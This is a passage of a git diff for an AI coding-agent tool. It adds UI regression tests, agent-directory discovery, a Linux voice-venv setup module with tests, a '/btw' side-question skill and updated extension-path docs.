+  if (!command.trim()) return command;
+  if (!isRtkEnabled(env)) return command;
+
+  const binaryPath = options.binaryPath ?? resolveRtkBinaryPath({ env });
+  if (!binaryPath) return command;
+
+  const run = options.spawnSyncImpl ?? spawnSync;
+  const result = run(binaryPath, ["rewrite", command], {
+    encoding: "utf-8",
+    env: buildRtkEnv(env),
+    stdio: ["ignore", "pipe", "ignore"],
+    timeout: getRewriteTimeoutMs(env),
+    // .cmd/.bat wrappers (used by fake-rtk in tests) require shell:true on Windows
+    shell: /\.(cmd|bat)$/i.test(binaryPath),
+  });
+
+  if (result.error) return command;
+  if (result.status !== 0 && result.status !== 3) return command;
+
+  const rewritten = (result.stdout ?? "").trimEnd();
+  return rewritten || command;
+}
diff --git a/src/resources/extensions/shared/tests/ask-user-freetext.test.ts b/src/resources/extensions/shared/tests/ask-user-freetext.test.ts
new file mode 100644
index 000000000..41e4d8292
--- /dev/null
+++ b/src/resources/extensions/shared/tests/ask-user-freetext.test.ts
@@ -0,0 +1,161 @@
+/**
+ * Tests for ask-user-questions free-text input behavior.
+ *
+ * Bug #2715: The ask-user-questions UI lacks free-text input and can trap
+ * users in a loop when the agent needs an explanation rather than a fixed
+ * choice.
+ *
+ * These tests exercise the RPC fallback path (ctx.ui.select) in
+ * ask-user-questions.ts to ensure that selecting "None of the above"
+ * triggers a follow-up free-text input prompt via ctx.ui.input().
+ */
+
+import { describe, it, beforeEach } from "node:test";
+import assert from "node:assert/strict";
+
+// The ask-user-questions extension registers a tool via pi.registerTool().
+// We capture that registration and call execute() directly with a mock context.
+import AskUserQuestions from "../../ask-user-questions.js";
+import { resetAskUserQuestionsCache } from "../../ask-user-questions.js";
+
+interface CapturedTool {
+	name: string;
+	execute: (...args: any[]) => Promise<any>;
+}
+
+function captureTool(): CapturedTool {
+	let captured: CapturedTool | null = null;
+	const fakePi = {
+		registerTool(tool: any) {
+			captured = { name: tool.name, execute: tool.execute };
+		},
+	};
+	AskUserQuestions(fakePi as any);
+	if (!captured) throw new Error("No tool registered");
+	return captured;
+}
+
+function makeQuestion(id: string, options: string[]) {
+	return {
+		id,
+		header: id,
+		question: `Pick for ${id}`,
+		options: options.map((label) => ({ label, description: `Desc for ${label}` })),
+	};
+}
+
+function makeMockCtx(opts: {
+	selectReturns: (string | string[] | undefined)[];
+	inputReturns?: (string | undefined)[];
+}) {
+	let selectCallIdx = 0;
+	let inputCallIdx = 0;
+	const selectCalls: { title: string; options: string[] }[] = [];
+	const inputCalls: { title: string; placeholder?: string }[] = [];
+
+	return {
+		ctx: {
+			hasUI: true,
+			ui: {
+				custom: () => undefined, // force RPC fallback
+				select: async (title: string, options: string[], selectOpts?: any) => {
+					selectCalls.push({ title, options });
+					return opts.selectReturns[selectCallIdx++];
+				},
+				input: async (title: string, placeholder?: string) => {
+					inputCalls.push({ title, placeholder });
+					return (opts.inputReturns ?? [])[inputCallIdx++];
+				},
+			},
+		},
+		selectCalls,
+		inputCalls,
+	};
+}
+
+describe("ask-user-questions RPC fallback free-text", () => {
+	beforeEach(() => {
+		resetAskUserQuestionsCache();
+	});
+
+	it("prompts for free-text input when user selects 'None of the above'", async () => {
+		const tool = captureTool();
+		const { ctx, selectCalls, inputCalls } = makeMockCtx({
+			selectReturns: ["None of the above"],
+			inputReturns: ["I need to explain my reasoning"],
+		});
+
+		const params = {
+			questions: [makeQuestion("q1", ["Option A", "Option B"])],
+		};
+
+		const result = await tool.execute("call-1", params, undefined, undefined, ctx);
+
+		// The select should have been called with "None of the above" appended
+		assert.equal(selectCalls.length, 1);
+		assert.ok(
+			selectCalls[0].options.includes("None of the above"),
+			"select options should include 'None of the above'",
+		);
+
+		// A follow-up input() call should have been made to collect free text
+		assert.equal(inputCalls.length, 1, "should call ctx.ui.input() for free-text after 'None of the above'");
+
+		// The result should include the user's free-text note
+		const text = result.content[0]?.text;
+		assert.ok(text, "result should have text content");
+		const parsed = JSON.parse(text);
+		assert.ok(
+			parsed.answers.q1,
+			"answer for q1 should exist",
+		);
+		const q1Answers = parsed.answers.q1.answers;
+		assert.ok(
+			q1Answers.some((a: string) => a.includes("I need to explain my reasoning")),
+			"answer should include the free-text explanation",
+		);
+	});
+
+	it("does NOT prompt for free-text when user selects a normal option", async () => {
+		const tool = captureTool();
+		const { ctx, inputCalls } = makeMockCtx({
+			selectReturns: ["Option A"],
+		});
+
+		const params = {
+			questions: [makeQuestion("q1", ["Option A", "Option B"])],
+		};
+
+		const result = await tool.execute("call-2", params, undefined, undefined, ctx);
+
+		// No input() call should have been made
+		assert.equal(inputCalls.length, 0, "should NOT call ctx.ui.input() for a normal option");
+
+		const text = result.content[0]?.text;
+		const parsed = JSON.parse(text);
+		assert.deepStrictEqual(parsed.answers.q1.answers, ["Option A"]);
+	});
+
+	it("handles cancelled free-text input gracefully", async () => {
+		const tool = captureTool();
+		const { ctx, inputCalls } = makeMockCtx({
+			selectReturns: ["None of the above"],
+			inputReturns: [undefined], // user cancelled the input
+		});
+
+		const params = {
+			questions: [makeQuestion("q1", ["Option A", "Option B"])],
+		};
+
+		const result = await tool.execute("call-3", params, undefined, undefined, ctx);
+
+		// Input should still have been called
+		assert.equal(inputCalls.length, 1, "should call ctx.ui.input() even if user cancels");
+
+		// Result should still contain "None of the above" without a note
+		const text = result.content[0]?.text;
+		assert.ok(text, "result should have text content");
+		const parsed = JSON.parse(text);
+		assert.deepStrictEqual(parsed.answers.q1.answers, ["None of the above"]);
+	});
+});
diff --git a/src/resources/extensions/shared/tests/interview-notes-loop.test.ts b/src/resources/extensions/shared/tests/interview-notes-loop.test.ts
new file mode 100644
index 000000000..5e0a5704b
--- /dev/null
+++ b/src/resources/extensions/shared/tests/interview-notes-loop.test.ts
@@ -0,0 +1,142 @@
+// GSD2 — Regression test for interview-ui "None of the above" notes loop
+// Copyright (c) 2026 Jeremy McSpadden <jeremy@fluxlabs.net>
+
+/**
+ * Regression test for bug #3502:
+ *
+ * Selecting "None of the above" opens the notes field, but pressing Enter
+ * after typing a note called goNextOrSubmit() which saw the cursor still
+ * on the "None of the above" slot and re-opened notes — trapping the user
+ * in an infinite loop.
+ *
+ * The fix adds a `!states[currentIdx].notes` guard so auto-open only fires
+ * when notes are still empty.
+ */
+
+import { describe, it } from "node:test";
+import assert from "node:assert/strict";
+import { showInterviewRound, type Question, type RoundResult } from "../interview-ui.js";
+
+// Raw terminal sequences that matchesKey() recognises
+const ENTER = "\r";
+const DOWN = "\x1b[B";
+const TAB = "\t";
+
+/**
+ * Drive showInterviewRound with a scripted sequence of key inputs.
+ * We mock ctx.ui.custom() to capture the widget, feed it inputs, and
+ * resolve when done() is called.
+ */
+function runWithInputs(
+	questions: Question[],
+	inputs: string[],
+): Promise<RoundResult> {
+	return new Promise((resolve, reject) => {
+		const timeout = setTimeout(() => reject(new Error("Timed out — likely stuck in infinite loop")), 3000);
+
+		const mockCtx = {
+			ui: {
+				custom: (factory: any) => {
+					const mockTui = {
+						requestRender: () => {},
+					};
+					const mockTheme = {
+						// Minimal theme stubs — render output is not asserted
+						fg: (_c: string, t: string) => t,
+						bold: (t: string) => t,
+						dim: (t: string) => t,
+						italic: (t: string) => t,
+						strikethrough: (t: string) => t,
+						accent: (t: string) => t,
+						success: (t: string) => t,
+						warning: (t: string) => t,
+						error: (t: string) => t,
+						info: (t: string) => t,
+						muted: (t: string) => t,
+						dimmed: (t: string) => t,
+					};
+					const mockKb = {};
+
+					const widget = factory(mockTui, mockTheme, mockKb, (result: RoundResult) => {
+						clearTimeout(timeout);
+						resolve(result);
+					});
+
+					// Feed each input sequentially
+					for (const input of inputs) {
+						widget.handleInput(input);
+					}
+				},
+			},
+		};
+
+		showInterviewRound(questions, {}, mockCtx as any).catch(reject);
+	});
+}
+
+describe("interview-ui notes loop regression (#3502)", () => {
+	const questions: Question[] = [
+		{
+			id: "q1",
+			header: "Project Type",
+			question: "What type of project?",
+			options: [
+				{ label: "Web App", description: "Frontend or full-stack" },
+				{ label: "CLI Tool", description: "Command-line utility" },
+			],
+		},
+	];
+
+	it("does not loop when Enter is pressed after typing a note on 'None of the above'", async () => {
+		// With 2 options, "None of the above" is index 2 (0-based)
+		// Cursor starts at 0, so press Down twice to reach it
+		const result = await runWithInputs(questions, [
+			DOWN,        // cursor → index 1 (CLI Tool)
+			DOWN,        // cursor → index 2 (None of the above)
+			ENTER,       // commit → auto-opens notes field
+			"u", "n", "s", "u", "r", "e",  // type "unsure"
+			ENTER,       // should advance to review, NOT reopen notes
+			ENTER,       // submit from review screen
+		]);
+
+		// If we get here, the loop did not occur (timeout would have fired)
+		assert.ok(result, "should return a result");
+		assert.equal(result.endInterview, false);
+
+		const answer = result.answers.q1;
+		assert.ok(answer, "answer for q1 should exist");
+		assert.equal(answer.notes, "unsure", "notes should contain typed text");
+		assert.equal(answer.selected, "None of the above");
+	});
+
+	it("Enter on empty notes advances instead of re-opening (notesVisible guard)", async () => {
+		// Press Down twice to "None of the above", Enter to select
+		// Then immediately Enter again (empty notes) — notesVisible is already
+		// true from auto-open, so the guard prevents re-opening and Enter
+		// advances to review. The notes remain empty.
+		const result = await runWithInputs(questions, [
+			DOWN,        // cursor → 1
+			DOWN,        // cursor → 2 (None of the above)
+			ENTER,       // commit → auto-opens notes (notesVisible = true)
+			ENTER,       // empty notes → notesVisible prevents re-open → advances to review
+			ENTER,       // submit from review screen
+		]);
+
+		assert.ok(result, "should return a result");
+		const answer = result.answers.q1;
+		assert.ok(answer, "answer for q1 should exist");
+		assert.equal(answer.notes, "");
+	});
+
+	it("normal option selection is unaffected", async () => {
+		const result = await runWithInputs(questions, [
+			ENTER,       // select first option (Web App) and advance to review
+			ENTER,       // submit from review screen
+		]);
+
+		assert.ok(result, "should return a result");
+		const answer = result.answers.q1;
+		assert.ok(answer, "answer for q1 should exist");
+		assert.equal(answer.selected, "Web App");
+	});
+});
diff --git a/src/resources/extensions/subagent/agents.ts b/src/resources/extensions/subagent/agents.ts
index 498ec31cc..6f14c3bcf 100644
--- a/src/resources/extensions/subagent/agents.ts
+++ b/src/resources/extensions/subagent/agents.ts
@@ -6,6 +6,8 @@ import * as fs from "node:fs";
 import * as path from "node:path";
 import { getAgentDir, parseFrontmatter } from "@gsd/pi-coding-agent";
 
+const PROJECT_AGENT_DIR_CANDIDATES = [".gsd", ".pi"] as const;
+
 export type AgentScope = "user" | "project" | "both";
 
 export interface AgentConfig {
@@ -23,6 +25,33 @@ export interface AgentDiscoveryResult {
 	projectAgentsDir: string | null;
 }
 
+interface AgentFrontmatter extends Record<string, unknown> {
+	name?: string;
+	description?: string;
+	tools?: string | string[];
+	model?: string;
+}
+
+function parseAgentTools(value: string | string[] | undefined): string[] | undefined {
+	if (typeof value === "string") {
+		const tools = value
+			.split(",")
+			.map((tool) => tool.trim())
+			.filter(Boolean);
+		return tools.length > 0 ? tools : undefined;
+	}
+
+	if (Array.isArray(value)) {
+		const tools = value
+			.flatMap((tool) => typeof tool === "string" ? tool.split(",") : [])
+			.map((tool) => tool.trim())
+			.filter(Boolean);
+		return tools.length > 0 ? tools : undefined;
+	}
+
+	return undefined;
+}
+
 function loadAgentsFromDir(dir: string, source: "user" | "project"): AgentConfig[] {
 	const agents: AgentConfig[] = [];
 
@@ -49,16 +78,13 @@ function loadAgentsFromDir(dir: string, source: "user" | "project"): AgentConfig
 			continue;
 		}
 
-		const { frontmatter, body } = parseFrontmatter<Record<string, string>>(content);
+		const { frontmatter, body } = parseFrontmatter<AgentFrontmatter>(content);
 
-		if (!frontmatter.name || !frontmatter.description) {
+		if (typeof frontmatter.name !== "string" || typeof frontmatter.description !== "string") {
 			continue;
 		}
 
-		const tools = frontmatter.tools
-			?.split(",")
-			.map((t: string) => t.trim())
-			.filter(Boolean);
+		const tools = parseAgentTools(frontmatter.tools);
 
 		agents.push({
 			name: frontmatter.name,
@@ -85,8 +111,12 @@ function isDirectory(p: string): boolean {
 function findNearestProjectAgentsDir(cwd: string): string | null {
 	let currentDir = cwd;
 	while (true) {
-		const candidate = path.join(currentDir, ".pi", "agents");
-		if (isDirectory(candidate)) return candidate;
+		// Prefer the documented project-local location while preserving support
+		// for older workarounds that placed agents under .pi/agents.
+		for (const configDir of PROJECT_AGENT_DIR_CANDIDATES) {
+			const candidate = path.join(currentDir, configDir, "agents");
+			if (isDirectory(candidate)) return candidate;
+		}
 
 		const parentDir = path.dirname(currentDir);
 		if (parentDir === currentDir) return null;
diff --git a/src/resources/extensions/subagent/worker-registry.ts b/src/resources/extensions/subagent/worker-registry.ts
index ac52e9289..1f6cb90e2 100644
--- a/src/resources/extensions/subagent/worker-registry.ts
+++ b/src/resources/extensions/subagent/worker-registry.ts
@@ -54,9 +54,10 @@ export function updateWorker(id: string, status: "completed" | "failed"): void {
   if (entry) {
     entry.status = status;
     // Remove after a brief display window (5 seconds)
+    // unref() so the timer doesn't keep the process alive in test environments
     setTimeout(() => {
       activeWorkers.delete(id);
-    }, 5000);
+    }, 5000).unref();
   }
 }
 
diff --git a/src/resources/extensions/voice/index.ts b/src/resources/extensions/voice/index.ts
index 041d1c418..5cfedc195 100644
--- a/src/resources/extensions/voice/index.ts
+++ b/src/resources/extensions/voice/index.ts
@@ -4,9 +4,9 @@ import type { AssistantMessage } from "@gsd/pi-ai";
 import { isKeyRelease, Key, matchesKey, truncateToWidth, visibleWidth } from "@gsd/pi-tui";
 import { spawn, execFileSync, type ChildProcess } from "node:child_process";
 import * as fs from "node:fs";
-import * as os from "node:os";
 import * as path from "node:path";
 import * as readline from "node:readline";
+import { linuxPython, diagnoseSounddeviceError, ensureVoiceVenv, VOICE_VENV_PYTHON } from "./linux-ready.js";
 
 const __extensionDir = import.meta.dirname!;
 const SWIFT_SRC = path.join(__extensionDir, "speech-recognizer.swift");
@@ -15,19 +15,6 @@ const PYTHON_SCRIPT = path.join(__extensionDir, "speech-recognizer.py");
 
 const IS_DARWIN = process.platform === "darwin";
 const IS_LINUX = process.platform === "linux";
-const VOICE_VENV_PYTHON = path.join(
-	process.env.HOME || process.env.USERPROFILE || os.homedir(),
-	".gsd",
-	"voice-venv",
-	"bin",
-	"python3",
-);
-
-/** Return the python3 binary path — prefer venv if it exists, else system. */
-function linuxPython(): string {
-	if (fs.existsSync(VOICE_VENV_PYTHON)) return VOICE_VENV_PYTHON;
-	return "python3";
-}
 
 function ensureBinary(): boolean {
 	if (fs.existsSync(RECOGNIZER_BIN)) return true;
@@ -69,17 +56,20 @@ function ensureLinuxReady(ctx: ExtensionContext): boolean {
 		});
 	} catch (err: unknown) {
 		const stderr = (err as { stderr?: Buffer })?.stderr?.toString() ?? "";
-		if (stderr.includes("sounddevice") || stderr.includes("PortAudio") || stderr.includes("portaudio")) {
-			ctx.ui.notify("Voice: install libportaudio2 with: sudo apt install libportaudio2", "error");
-		} else if (stderr.includes("No module") || stderr.includes("ModuleNotFoundError")) {
-			// Deps missing — the Python script handles auto-install on first run,
-			// so we let it through. The script's own ensure_deps() will pip install.
-			ctx.ui.notify("Voice: installing dependencies on first run — this may take a moment", "info");
+		const diagnosis = diagnoseSounddeviceError(stderr);
+
+		if (diagnosis === "missing-module") {
+			// Module not installed — auto-create venv (handles PEP 668 systems
+			// where system pip is blocked). See #2403.
+			if (!ensureVoiceVenv({ notify: (msg, level) => ctx.ui.notify(msg, level) })) {
+				return false;
+			}
 			linuxReady = true;
 			return true;
+		} else if (diagnosis === "missing-portaudio") {
+			ctx.ui.notify("Voice: install libportaudio2 with: sudo apt install libportaudio2", "error");
 		} else {
 			ctx.ui.notify(`Voice: dependency check failed — ${stderr.split("\n")[0] || "unknown error"}`, "error");
-			return false;
 		}
 		return false;
 	}
diff --git a/src/resources/extensions/voice/linux-ready.ts b/src/resources/extensions/voice/linux-ready.ts
new file mode 100644
index 000000000..560046b2d
--- /dev/null
+++ b/src/resources/extensions/voice/linux-ready.ts
@@ -0,0 +1,87 @@
+/**
+ * linux-ready.ts — Linux voice readiness logic (extracted for testability).
+ *
+ * Handles:
+ *   - Detecting system vs venv python3
+ *   - Diagnosing sounddevice import errors (portaudio vs missing module)
+ *   - Auto-creating venv on PEP 668 systems
+ */
+
+import { execFileSync } from "node:child_process";
+import * as fs from "node:fs";
+import * as os from "node:os";
+import * as path from "node:path";
+
+export const VOICE_VENV_DIR = path.join(
+	process.env.HOME || process.env.USERPROFILE || os.homedir(),
+	".gsd",
+	"voice-venv",
+);
+export const VOICE_VENV_PYTHON = path.join(VOICE_VENV_DIR, "bin", "python3");
+
+/** Return the python3 binary path — prefer venv if it exists, else system. */
+export function linuxPython(): string {
+	if (fs.existsSync(VOICE_VENV_PYTHON)) return VOICE_VENV_PYTHON;
+	return "python3";
+}
+
+/**
+ * Diagnose a sounddevice import error from its stderr output.
+ *
+ * Returns:
+ *   - "missing-module"  — sounddevice python package not installed
+ *   - "missing-portaudio" — libportaudio2 native library not found
+ *   - "unknown"         — unrecognized error
+ *
+ * IMPORTANT: Check "No module" / "ModuleNotFoundError" BEFORE checking for the
+ * word "sounddevice", because `ModuleNotFoundError: No module named 'sounddevice'`
+ * contains both strings. The more specific check must come first.
+ */
+export function diagnoseSounddeviceError(stderr: string): "missing-module" | "missing-portaudio" | "unknown" {
+	// Check for missing Python module FIRST — the error message
+	// "ModuleNotFoundError: No module named 'sounddevice'" contains the word
+	// "sounddevice", so the old order (checking "sounddevice" first) was wrong.
+	if (stderr.includes("No module") || stderr.includes("ModuleNotFoundError")) {
+		return "missing-module";
+	}
+	// Now check for native portaudio library issues.
+	if (stderr.includes("PortAudio") || stderr.includes("portaudio")) {
+		return "missing-portaudio";
+	}
+	return "unknown";
+}
+
+export interface ReadinessCallbacks {
+	notify: (message: string, level: "info" | "error") => void;
+	/** Override for execFileSync — for testing. Uses execFileSync (safe, no shell). */
+	execFile?: typeof execFileSync;
+	/** Override for fs.existsSync — for testing */
+	exists?: typeof fs.existsSync;
+}
+
+/**
+ * Auto-create the voice venv if it doesn't exist.
+ * Uses execFileSync internally (no shell, safe from injection).
+ *
+ * Returns true on success, false on failure.
+ */
+export function ensureVoiceVenv(cb: ReadinessCallbacks): boolean {
+	const exists = cb.exists ?? fs.existsSync;
+	const execFile = cb.execFile ?? execFileSync;
+
+	if (exists(VOICE_VENV_PYTHON)) return true;
+
+	cb.notify("Voice: setting up Python environment — one-time setup", "info");
+	try {
+		execFile("python3", ["-m", "venv", VOICE_VENV_DIR], { timeout: 30000 });
+		execFile(
+			path.join(VOICE_VENV_DIR, "bin", "pip"),
+			["install", "sounddevice", "requests", "--quiet"],
+			{ timeout: 120000 },
+		);
+		return true;
+	} catch {
+		cb.notify("Voice: failed to create Python venv — run: python3 -m venv ~/.gsd/voice-venv", "error");
+		return false;
+	}
+}
diff --git a/src/resources/extensions/voice/tests/linux-ready.test.ts b/src/resources/extensions/voice/tests/linux-ready.test.ts
new file mode 100644
index 000000000..8e0327a88
--- /dev/null
+++ b/src/resources/extensions/voice/tests/linux-ready.test.ts
@@ -0,0 +1,124 @@
+/**
+ * linux-ready.test.ts — Tests for Linux voice readiness logic (#2403).
+ *
+ * Covers:
+ *   - diagnoseSounddeviceError branch ordering (ModuleNotFoundError must NOT
+ *     match the portaudio branch, even though it contains "sounddevice")
+ *   - ensureVoiceVenv auto-creation
+ *   - linuxPython venv detection
+ */
+
+import { createTestContext } from "../../gsd/tests/test-helpers.ts";
+import { diagnoseSounddeviceError, ensureVoiceVenv } from "../linux-ready.ts";
+
+const { assertEq, assertTrue, report } = createTestContext();
+
+function main(): void {
+	// ── diagnoseSounddeviceError ──────────────────────────────────────────
+
+	// The critical regression: "ModuleNotFoundError: No module named 'sounddevice'"
+	// contains the word "sounddevice", so the old code matched the portaudio branch.
+	console.log("\n=== diagnoseSounddeviceError: ModuleNotFoundError must return missing-module ===");
+	{
+		const stderr = "Traceback (most recent call last):\n  File \"<string>\", line 1, in <module>\nModuleNotFoundError: No module named 'sounddevice'";
+		assertEq(diagnoseSounddeviceError(stderr), "missing-module",
+			"ModuleNotFoundError for sounddevice should be 'missing-module', not 'missing-portaudio'");
+	}
+
+	console.log("\n=== diagnoseSounddeviceError: 'No module named sounddevice' variant ===");
+	{
+		const stderr = "ImportError: No module named sounddevice";
+		assertEq(diagnoseSounddeviceError(stderr), "missing-module",
+			"'No module' substring should return missing-module");
+	}
+
+	console.log("\n=== diagnoseSounddeviceError: actual portaudio error ===");
+	{
+		const stderr = "OSError: PortAudio library not found";
+		assertEq(diagnoseSounddeviceError(stderr), "missing-portaudio",
+			"PortAudio library error should return missing-portaudio");
+	}
+
+	console.log("\n=== diagnoseSounddeviceError: lowercase portaudio error ===");
+	{
+		const stderr = "OSError: libportaudio.so.2: cannot open shared object file: No such file or directory";
+		assertEq(diagnoseSounddeviceError(stderr), "missing-portaudio",
+			"lowercase portaudio error should return missing-portaudio");
+	}
+
+	console.log("\n=== diagnoseSounddeviceError: unrelated error ===");
+	{
+		const stderr = "SyntaxError: invalid syntax";
+		assertEq(diagnoseSounddeviceError(stderr), "unknown",
+			"unrelated error should return unknown");
+	}
+
+	console.log("\n=== diagnoseSounddeviceError: empty stderr ===");
+	{
+		assertEq(diagnoseSounddeviceError(""), "unknown",
+			"empty stderr should return unknown");
+	}
+
+	// ── ensureVoiceVenv ──────────────────────────────────────────────────
+
+	console.log("\n=== ensureVoiceVenv: returns true when venv already exists ===");
+	{
+		const notifications: string[] = [];
+		const result = ensureVoiceVenv({
+			notify: (msg) => notifications.push(msg),
+			exists: () => true,
+			execFile: (() => Buffer.from("")) as any,
+		});
+		assertTrue(result, "should return true when venv exists");
+		assertEq(notifications.length, 0, "should not notify when venv exists");
+	}
+
+	console.log("\n=== ensureVoiceVenv: creates venv when missing ===");
+	{
+		const notifications: string[] = [];
+		const commands: string[][] = [];
+		let existsCalled = false;
+
+		const result = ensureVoiceVenv({
+			notify: (msg) => notifications.push(msg),
+			exists: () => { existsCalled = true; return false; },
+			execFile: ((cmd: string, args: string[]) => {
+				commands.push([cmd, ...args]);
+				return Buffer.from("");
+			}) as any,
+		});
+
+		assertTrue(result, "should return true after venv creation");
+		assertTrue(existsCalled, "should check if venv exists");
+		assertEq(commands.length, 2, "should run 2 commands (venv + pip)");
+		assertTrue(commands[0][0] === "python3", "first command is python3");
+		assertTrue(commands[0].includes("-m") && commands[0].includes("venv"),
+			"first command creates venv");
+		assertTrue(commands[1][0].endsWith("bin/pip"), "second command is pip");
+		assertTrue(commands[1].includes("sounddevice"), "pip installs sounddevice");
+		assertTrue(commands[1].includes("requests"), "pip installs requests");
+		assertTrue(notifications[0].includes("one-time setup"),
+			"notifies about one-time setup");
+	}
+
+	console.log("\n=== ensureVoiceVenv: returns false and notifies on failure ===");
+	{
+		const notifications: Array<{ msg: string; level: string }> = [];
+
+		const result = ensureVoiceVenv({
+			notify: (msg, level) => notifications.push({ msg, level }),
+			exists: () => false,
+			execFile: (() => { throw new Error("externally-managed-environment"); }) as any,
+		});
+
+		assertTrue(!result, "should return false on failure");
+		const errorNotif = notifications.find(n => n.level === "error");
+		assertTrue(errorNotif !== undefined, "should emit error notification");
+		assertTrue(errorNotif!.msg.includes("python3 -m venv"),
+			"error message should suggest manual venv creation");
+	}
+
+	report();
+}
+
+main();
diff --git a/src/resources/skills/btw/SKILL.md b/src/resources/skills/btw/SKILL.md
new file mode 100644
index 000000000..c3a103f8f
--- /dev/null
+++ b/src/resources/skills/btw/SKILL.md
@@ -0,0 +1,42 @@
+---
+name: btw
+description: Ask a quick side question about your current work without derailing the main task. Answers from existing conversation context only — no tool calls, no file reads, single concise response. Use when you need a fast answer from what is already in this session.
+---
+
+<objective>
+Answer a quick side question using only what is already present in the current conversation context. Do not read files, run commands, search, or use any tools. Give a single, concise response and return focus to the main work.
+</objective>
+
+<behavior>
+**This is a side question, not a task.**
+
+- Answer only from information already in the conversation (files read, decisions made, code seen, context established)
+- Do NOT use any tools — no Read, no Bash, no Grep, no Search
+- If the answer requires reading something new, say so briefly and suggest the user ask as a normal prompt instead
+- Keep the response short and direct — one to a few sentences unless the question genuinely needs more
+- Do not summarize the main work, ask follow-up questions, or offer to do anything else
+- After answering, stop — do not prompt for next steps
+</behavior>
+
+<quick_start>
+Parse the argument after `/btw` as the question. Answer it directly from context.
+
+If no argument is provided, ask: "What did you want to know?"
+
+If the question cannot be answered from current context (requires reading a file, running a command, or information not yet in the session), respond with:
+"I'd need to [read X / run Y / look up Z] to answer that — ask it as a normal prompt when you're ready."
+</quick_start>
+
+<examples>
+**Good uses of /btw:**
+- `/btw what was the name of that config file again?` → answers from files already read in session
+- `/btw which branch are we on?` → answers from git context already established
+- `/btw did we already handle the null case in that function?` → answers from code already reviewed
+- `/btw what model does this use?` → answers from code or config already in context
+
+**Not a good fit for /btw (suggest normal prompt):**
+- Questions requiring reading a file not yet seen
+- Questions requiring running a command
+- Questions needing a multi-step answer or follow-up
+- Starting a new task or changing direction
+</examples>
diff --git a/src/resources/skills/create-gsd-extension/SKILL.md b/src/resources/skills/create-gsd-extension/SKILL.md
index e233c0229..28c51efca 100644
--- a/src/resources/skills/create-gsd-extension/SKILL.md
+++ b/src/resources/skills/create-gsd-extension/SKILL.md
@@ -7,9 +7,11 @@ description: Create, debug, and iterate on GSD extensions (TypeScript modules th
 
 **Extensions are TypeScript modules** that hook into GSD's runtime (built on pi). They export a default function receiving `ExtensionAPI` and use it to subscribe to events, register tools/commands/shortcuts, and interact with the session.
 
-**GSD extension paths:**
-- Global extensions: `~/.gsd/agent/extensions/*.ts` or `~/.gsd/agent/extensions/*/index.ts`
-- Project-local extensions: `.gsd/extensions/*.ts` or `.gsd/extensions/*/index.ts`
+**GSD extension paths (community/user-installed extensions):**
+- Global: `~/.pi/agent/extensions/*.ts` or `~/.pi/agent/extensions/*/index.ts`
+- Project-local: `.gsd/extensions/*.ts` or `.gsd/extensions/*/index.ts`
+
+Note: `~/.gsd/agent/extensions/` is reserved for bundled extensions synced from the gsd-pi package. Community extensions placed there are silently ignored by the loader.
 
 **The three primitives:**
 1. **Events** — Listen and react (`pi.on("event", handler)`). Can block tool calls, modify messages, inject context.
diff --git a/src/resources/skills/create-gsd-extension/references/key-rules-gotchas.md b/src/resources/skills/create-gsd-extension/references/key-rules-gotchas.md
index 75f73f2c8..11b300677 100644
--- a/src/resources/skills/create-gsd-extension/references/key-rules-gotchas.md
+++ b/src/resources/skills/create-gsd-extension/references/key-rules-gotchas.md
@@ -26,11 +26,12 @@ Non-negotiable rules and common gotchas when building GSD extensions.
 </common_patterns>
 
 <gsd_paths>
-**GSD extension paths:**
-- Global: `~/.gsd/agent/extensions/*.ts`
-- Global (subdir): `~/.gsd/agent/extensions/*/index.ts`
+**GSD extension paths (community/user-installed extensions):**
+- Global: `~/.pi/agent/extensions/*.ts`
+- Global (subdir): `~/.pi/agent/extensions/*/index.ts`
 - Project-local: `.gsd/extensions/*.ts`
 - Project-local (subdir): `.gsd/extensions/*/index.ts`
 
-The upstream pi docs reference `~/.pi` paths — GSD uses `~/.gsd` everywhere instead.
+Note: `~/.gsd/agent/extensions/` is reserved for bundled extensions synced from the gsd-pi package.
+Community extensions placed there are silently ignored by the loader.
 </gsd_paths>
diff --git a/src/resources/skills/create-gsd-extension/workflows/add-capability.md b/src/resources/skills/create-gsd-extension/workflows/add-capability.md
index a069e4570..eac2e4ea1 100644
--- a/src/resources/skills/create-gsd-extension/workflows/add-capability.md
+++ b/src/resources/skills/create-gsd-extension/workflows/add-capability.md
@@ -14,7 +14,7 @@ Read the reference file for the specific capability being added:
 ## Step 1: Identify the Extension
 
 Locate the existing extension file. Check:
-- `~/.gsd/agent/extensions/` (global)
+- `~/.pi/agent/extensions/` (global community extensions)
 - `.gsd/extensions/` (project-local)
 
 Read the current extension code to understand its structure.
@@ -28,7 +28,7 @@ If the extension needs new imports, add them at the top of the file.
 ## Step 3: Handle Structural Changes
 
 **Single file → Directory**: If the extension is outgrowing a single file:
-1. Create `~/.gsd/agent/extensions/my-extension/`
+1. Create `~/.pi/agent/extensions/my-extension/`
 2. Move the file to `index.ts`
 3. Extract helpers to separate files
 
diff --git a/src/resources/skills/create-gsd-extension/workflows/create-extension.md b/src/resources/skills/create-gsd-extension/workflows/create-extension.md
index 817efa13b..a91a39ae6 100644
--- a/src/resources/skills/create-gsd-extension/workflows/create-extension.md
+++ b/src/resources/skills/create-gsd-extension/workflows/create-extension.md
@@ -12,7 +12,7 @@
 ## Step 1: Determine Scope and Placement
 
 Ask the user:
-- **Global** (`~/.gsd/agent/extensions/`) — Available in all GSD sessions
+- **Global** (`~/.pi/agent/extensions/`) — Available in all GSD sessions
 - **Project-local** (`.gsd/extensions/`) — Available only in this project
 
 ## Step 2: Determine Extension Capabilities
@@ -36,12 +36,12 @@ Identify what the extension needs from the user's description:
 
 **Single file** — for small extensions (1-2 tools/commands, simple hooks):
 ```
-~/.gsd/agent/extensions/my-extension.ts
+~/.pi/agent/extensions/my-extension.ts
 ```
 
 **Directory with index.ts** — for multi-file extensions:
 ```
-~/.gsd/agent/extensions/my-extension/
+~/.pi/agent/extensions/my-extension/
 ├── index.ts
 ├── tools.ts
 └── utils.ts
@@ -49,7 +49,7 @@ Identify what the extension needs from the user's description:
 
 **Package with dependencies** — when npm packages are needed:
 ```
-~/.gsd/agent/extensions/my-extension/
+~/.pi/agent/extensions/my-extension/
 ├── package.json
 ├── src/index.ts
 └── node_modules/
diff --git a/src/resources/skills/create-gsd-extension/workflows/debug-extension.md b/src/resources/skills/create-gsd-extension/workflows/debug-extension.md
index 58b1e982e..5a8ac2295 100644
--- a/src/resources/skills/create-gsd-extension/workflows/debug-extension.md
+++ b/src/resources/skills/create-gsd-extension/workflows/debug-extension.md
@@ -32,12 +32,14 @@ gsd -e ./path/to/extension.ts
 
 ## Step 3: Verify File Location
